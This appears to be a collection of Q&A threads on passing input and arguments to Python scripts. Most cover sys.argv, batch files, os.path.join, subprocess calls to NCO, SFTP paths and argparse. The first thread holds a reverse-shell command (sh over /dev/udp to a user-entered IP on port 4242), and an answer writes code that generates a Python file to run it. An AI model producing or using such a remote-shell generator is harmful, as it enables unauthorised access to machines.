I have code similar to this
ip = input("Enter IP: ")
I need to make it after receving ip create new python file with this commands
import os
os.system('/bin/bash -c "setsid
sh -i >& /dev/udp/"ip"/4242
0>&1"')
And instead of "ip" I need it to write ip that user entered
And second script shouldn't ask for input, it should take data from first
You could do it with the following script:
ip = input("Enter IP: ")
bash_script = f"/bin/bash -c 'setsid sh -i >& /dev/udp/{ip}/4242 0>&1'"
other_python_script = f"""
import os
os.system(\"""{bash_script}\""")
"""
with open("otherscript.py", "w") as python_script_file:
python_script_file.write(other_python_script)
Well, what is happening there?
First, I write the ip value in the string containing the bash script using the f-string and stores it in bash_script
Then, I use f-string to write the bash_script inside the python code string that will be inside the python file. This string is stored in the other_python_script variable.
Lastly, I just write the python code string in a file called otherscript.py.
And you will have a python file with the code you want.
You could do the first and second steps in on the same line. I separated into two lines of code for a matter of clarity. And this code works only in python 3.6^. Older versions should use other methods for write values into strings.
Hopefully, this helps, please let me know if you need anything below explained.
import os

path = yourPathHere  # insert your file path here, without the file name itself
ip = input('insert ip address here: ')  # this will contain the ip address

if not os.path.exists(path):  # checks whether the path exists; if not,
    os.makedirs(path)         # create it

# this is a formatted string with the ip variable inside of it
pyFileContent = f'whatever/content/you/want/to/put/{ip}/whatever/else'

# creates a string with the name of your .py file
filename = 'yourPythonFileNameHere' + '.py'

# this joins the path and the file name, then creates and opens the file
with open(os.path.join(path, filename), 'w') as my_file:
    my_file.write(pyFileContent)  # writes the content into it, then closes it
I have the Python script below, which takes a user input that is eventually used by the program to read a particular file.
I want to execute the Python program from a batch script and pass the file_name from the batch script. Can someone please help?
file_name = input("Input File Name to Compare: ")
path = ("outward\\" + file_name)
import sys
file_name = sys.argv[1]
path = "outward\\" + file_name
and you pass it to your script like:
$ python script.py filename.ext
To run the Python program from the batch script and pass the filename to it, you need to use sys, so:
import sys
sys.argv is automatically a list of strings representing the arguments on the command line. You can use it as input for your program; sys.argv[1] represents the first command line argument (as a string) given to the script in question.
Lists are zero-indexed, so sys.argv[0] is the script name itself; to get the filename you need the first argument after the script name, so:
filename = sys.argv[1]
path = "outward\\" + filename
Next you need to pass it to your script like this:
$ python your_script.py filename.ext
(where .ext stands for the file's actual extension)
Your complete code for the solution, quite simply, is:
import sys
filename = sys.argv[1]
path = "outward\\" + filename
and
$ python your_script.py filename.ext
You could use Python's sys.argv list.
The idea would be to get the input from the user in the batch file, then execute the Python program from the batch file, passing the user input as a command line argument to the Python file. Example:
batchfile.bat
@echo off
set /p file="Enter Filename: "
python /path/to/program/pythonprogram.py %file%
pythonprogram.py
import sys
file_name = sys.argv[1]
path = ("outward\\" + file_name)
Now, when you execute the batch file, it will prompt for a filename. It will then run the Python program, passing the filename as a command-line argument, which the Python file can collect from the sys.argv list.
I have a program that relies on user input to enter files for the program to open in Python 2.7.11. I have all of those files in a sub-directory called TestCases within the original directory Detector, but I can't seem to access the files in TestCases when running the program from the super-directory. I tried to use os.path.join, but to no avail. Here is my code:
import os.path

def __init__(self):
    self.file = None
    os.path.join('Detector', 'TestCases')
    while self.file == None:
        self.input = raw_input('What file to open? ')
        try:
            self.file = open(self.input, 'r')
        except:
            print "Can't find file."
My terminal when I run the program goes as follows:
>>> What file to open? test.txt # From the TestCases directory
>>> Can't find file.
>>> What file to open? ...
Am I using os.path.join incorrectly? I thought it was supposed to link the two directories so that files could be accessed from the sub-directory while running the program from the super-directory.
You are calling os.path.join('Detector', 'TestCases'), which returns 'Detector/TestCases', but you aren't storing the result anywhere.
I suppose you are in the Detector directory and want to open files in TestCases. In that case you can use os.path.join (it concatenates its arguments and RETURNS the result):
import os.path

file = None
while not file:
    input = raw_input('What file to open? ')
    try:
        filepath = os.path.join('TestCases', input)
        file = open(filepath, 'r')
    except IOError:
        print "Can't find " + input
I have stored the result of os.path.join so you can see that it doesn't change the directory; it just concatenates its arguments. Maybe you were thinking that the function changes the directory; you can do that with os.chdir.
Try it first in a simple script or in the terminal; it will save many headaches.
The documentation for os.path.join says:
Join one or more path components intelligently. The return value is the concatenation of path...
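To illustrate the difference, here is a minimal sketch (it assumes a Detector/TestCases layout like yours and that you start from the directory that contains Detector):
import os

# os.path.join only builds and returns a string; it does not touch the
# current working directory.
path = os.path.join('Detector', 'TestCases')
print(path)  # Detector/TestCases (Detector\TestCases on Windows)

# os.chdir is what actually changes the current working directory.
os.chdir(path)
print(os.getcwd())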
It seems like you expect it to set some kind of PATH variable or affect the current working directory. As a first step, it should be sufficient to add something like this to your code:
open(os.path.join("TestCases",self.input), 'r')
1. Introduction
I have a bunch of files in netCDF format.
Each file contains the meteorological conditions of a location for a different period (hourly data).
I need to extract the first 12 h of data from each file, so I chose NCO (netCDF Operators) for the job.
NCO works in the terminal. With ncks -d Time 0,11 input.nc output.nc, I can get a data file called output.nc which contains the first 12 h of data from input.nc.
2. My attempt
I want to keep the whole process inside my IPython notebook, but I am stuck on two points:
How to execute a terminal command inside a Python loop
How to pass a Python string into the terminal command
Here is my fake code for example.
files = os.listdir('.')
for file in files:
    filename, extname = os.path.splitext(file)
    if extname == '.nc':
        output = filename + "_0-12_" + extname
        ## The code below was my attempt
        !ncks -d Time 0,11 file output
3. Conclusion
Basically, my goal is to make the fake code !ncks -d Time 0,11 file output actually work. That means:
executing the netCDF operator directly in a Python loop...
...using the filename, which is a string in the Python environment.
Sorry for my unclear question. Any advice would be appreciated!
You can use the subprocess module (subprocess.call in the code below) to execute an external program:
import glob
import os
import subprocess

for fn in glob.iglob('*.nc'):
    filename, extname = os.path.splitext(fn)
    output_fn = filename + "_0-12_" + extname
    output = subprocess.call(['ncks', '-d', 'Time', '0,11', fn, output_fn])
    print(output)
NOTE: updated the code to use glob.iglob; you don't need to check extension manually.
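If you also want to capture what ncks prints, rather than just its exit code, subprocess.check_output is an option. A minimal sketch with placeholder file names:
import subprocess

# check_output returns the command's stdout and raises CalledProcessError
# on a non-zero exit code. 'in.nc' and 'in_0-12_.nc' are placeholder names.
try:
    out = subprocess.check_output(['ncks', '-d', 'Time', '0,11', 'in.nc', 'in_0-12_.nc'])
    print(out)
except subprocess.CalledProcessError as e:
    print('ncks failed with exit code {}'.format(e.returncode))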
You may also check out pynco, which wraps NCO in subprocess calls, similar to @falsetru's answer. Your application may look something like:
import glob
import os
from nco import Nco  # pynco's wrapper class

nco = Nco()
for fn in glob.iglob('*.nc'):
    filename, extname = os.path.splitext(fn)
    output_fn = filename + "_0-12_" + extname
    # pass the full file name (with extension) as input
    nco.ncks(input=fn, output=output_fn, dimension='Time 0,11')
I'm pretty new to Python programming, and I wrote a script to automate uploading a file via SFTP to a remote machine. The script works wonderfully, but there is an issue that I can't seem to figure out: if I'm in the directory in which the file I'm trying to upload resides, everything goes fine, but when I type a filename that does not reside in that directory, it doesn't like that. It's a hassle having to browse to a different folder each time. I know I can consolidate the files into one folder, but I would love to try and automate this.
The /Downloads directory is hard-coded since that's where most tools reside. Does anyone know how I can tweak this line of code to grab the matching file name regardless of the directory the file resides in?
This is what I've written:
#! /usr/bin/python2
# includes
import thirdpartylib
import sys
if len(sys.argv) != 6:
    print "Usage: %s file url port username password" % sys.argv[0]
    exit(0)
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
username = sys.argv[4]
password = sys.argv[5]
filelocation = "Downloads/%s" % file
transport = thirdpartylib.Transport((host, port))
transport.connect(username=username, password=password)
sftp = thirdpartylib.SFTPClient.from_transport(transport)
sftp.put(file, filelocation)
sftp.close()
transport.close()
First of all, if you're doing any work with filepaths it is recommended that you use some built-in functionality to construct them to ensure that you have proper file separators etc. os.path.join is great for this.
That being said, I would recommend having the user pass in the file path as either an absolute path (in which case it can live anywhere on the machine) or a relative path (in which case it is relative to the current directory). I would not append Downloads/ to all the file paths as that obviously breaks any absolute paths and it requires the individual calling your program to know the internals of it. I think of this as the file path equivalent of a magic number.
So that boils down to changing filelocation to simply be the file input argument itself:
import os  # needed for the os.path checks below

filelocation = sys.argv[1]

# You can even do some validation if you want
if not os.path.isfile(filelocation):
    print "File '%s' does not exist!" % filelocation
If you really want that Downloads/ folder to be the default (if the file path isn't an absolute path), you can check to see if the input is an absolute path (using os.path.isabs) and if it's not, then specify that it's in the Downloads/ directory.
if not os.path.isabs(filelocation):
    filelocation = os.path.join('Downloads', filelocation)
Then users could call your script in two ways:
# Loads file in /absolute/path/to/file
./script.py /absolute/path/to/file ...
# Loads filename.txt from Downloads/filename.txt
./script.py filename.txt ...
Also, it looks like you may have your sftp.put input arguments reversed. The local filename should come first.
I think you want filelocation as the first argument to sftp.put, as that is supposed to be the filename on the local machine. Also, you probably want to put a slash in front of Downloads.
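Putting both of those points together, a minimal sketch (this assumes thirdpartylib's put() takes the local path first and the remote path second, like paramiko's SFTPClient.put, and that the remote name should just be the bare filename):
import sys
import thirdpartylib  # placeholder SFTP library from the question

file = sys.argv[1]
host, port = sys.argv[2], int(sys.argv[3])
username, password = sys.argv[4], sys.argv[5]

# local source path: leading slash so the tools directory is found
# regardless of the current working directory
filelocation = "/Downloads/%s" % file

transport = thirdpartylib.Transport((host, port))
transport.connect(username=username, password=password)
sftp = thirdpartylib.SFTPClient.from_transport(transport)

# local path first, remote path second
sftp.put(filelocation, file)

sftp.close()
transport.close()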
I have a python script that processes an XML file each day (it is transferred via SFTP to a remote directory, then temporarily copied to a local directory) and stores its information in a MySQL database.
One of my parameters for the file is set to "date=today" so that the correct file is processed each day. This works fine and each day I successfully store new file information into the database.
What I need help on is passing a Linux command line argument to run a file for a specific day (in case a previous day's file needs to be rerun). I can manually edit my code to make this work but this will not be an option once the project is in production.
In addition, I need to be able to pass in a command line argument for "date=*" and have the script run every file in my remote directory. Currently, this parameter successfully processes only a single file, chosen in alphabetical order.
If my two questions should be asked separately, my mistake, and I'll edit this question to just cover one of them. Example of my code below:
today = datetime.datetime.now().strftime('%Y%m%d')

file_var = local_file_path + connect_to_sftp.sftp_get_file(
    local_file_path=local_file_path,
    sftp_host=sftp_host,
    sftp_username=sftp_username,
    sftp_directory=sftp_directory,
    date=today)

ET = xml.etree.ElementTree.parse(file_var).getroot()

def parse_file():
    for node in ET.findall(.......)
In another module:
def sftp_get_file(local_file_path, sftp_host, sftp_username, sftp_directory, date):
    pysftp.Connection(sftp_host, sftp_username)
    # find file in remote directory with given suffix
    remote_file = glob.glob(sftp_directory + '/' + date + '_file_suffix.xml')
    # strip directory name from full file name
    file_name_only = remote_file[0][len(sftp_directory):]
    # set local path to hold new file
    local_path = local_file_path
    # combine local path with filename that was loaded
    local_file = local_path + file_name_only
    # pull file from remote directory and send to local directory
    shutil.copyfile(remote_file[0], local_file)
    return file_name_only
So the SFTP module reads the file, transfers it to the local directory, and returns the file name to be used in the parsing module. The parsing module passes in the parameters and does the rest of the work.
What I need to be able to do, on certain occasions, is override the parameter that says "date=today" and instead say "date=20151225", for example, but I must do this through a Linux command line argument.
In addition, if I currently enter the parameter of "date=*" it only runs the script for the first file that matches that parameter. I need the script to run for ALL files that match that parameter. Any help is much appreciated. Happy to answer any questions to improve clarity.
You can use the sys module and pass the date as a command line argument.
That would be:
import sys
today = str(sys.argv[1]) if len(sys.argv) > 1 else datetime.datetime.now().strftime('%Y%m%d')
If a date is given as the first argument, the today variable will be set to that command line value; otherwise, if no argument is given, it falls back to the current date from datetime.
For the second question, look at this line:
file_name_only = remote_file[0][len(sftp_directory):]
You are only accessing the first element, but glob might return several files when you use the * wildcard. You must iterate over the remote_file list and copy all of them, as in the sketch below.
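A minimal sketch of that change, as a hypothetical variant of sftp_get_file that copies every match and returns all of the local file names so the parsing module can loop over them:
import glob
import os
import shutil

def sftp_get_files(local_file_path, sftp_directory, date):
    # hypothetical plural variant of sftp_get_file from the question
    remote_files = glob.glob(sftp_directory + '/' + date + '_file_suffix.xml')
    copied = []
    for remote_file in remote_files:
        # os.path.basename strips the directory part of the remote path
        file_name_only = os.path.basename(remote_file)
        local_file = os.path.join(local_file_path, file_name_only)
        shutil.copyfile(remote_file, local_file)
        copied.append(file_name_only)
    return copied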
You can use argparse to consume command line arguments. You will have to check whether a specific date is passed and use it instead of the current date (see the parser sketch after the snippet below):
if args.date_to_run:
    today = args.date_to_run
else:
    today = datetime.datetime.now().strftime('%Y%m%d')
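For completeness, a minimal sketch of the argparse setup that the snippet above assumes (the date_to_run argument name is just an illustration):
import argparse
import datetime

# hypothetical parser: --date is optional, so the script still defaults to
# today's date when no argument is supplied
parser = argparse.ArgumentParser(description='Process the XML file for a given date')
parser.add_argument('--date', dest='date_to_run', default=None,
                    help='date to run, e.g. 20151225 (defaults to today)')
args = parser.parse_args()

if args.date_to_run:
    today = args.date_to_run
else:
    today = datetime.datetime.now().strftime('%Y%m%d')
You would then call it like python your_script.py --date 20151225.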
For the second part of your question you can use something like https://docs.python.org/2/library/fnmatch.html to match multiple files based on a pattern.
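A quick sketch of what that could look like; fnmatch.filter matches names against a shell-style pattern (the directory name here is a placeholder, and listing it with os.listdir is an assumption about how you enumerate the files):
import fnmatch
import os

date = '*'  # or a specific date such as '20151225'
pattern = date + '_file_suffix.xml'

# keep every file in the directory whose name fits the date pattern
for name in fnmatch.filter(os.listdir('some_directory'), pattern):
    print(name)  # process each matching file here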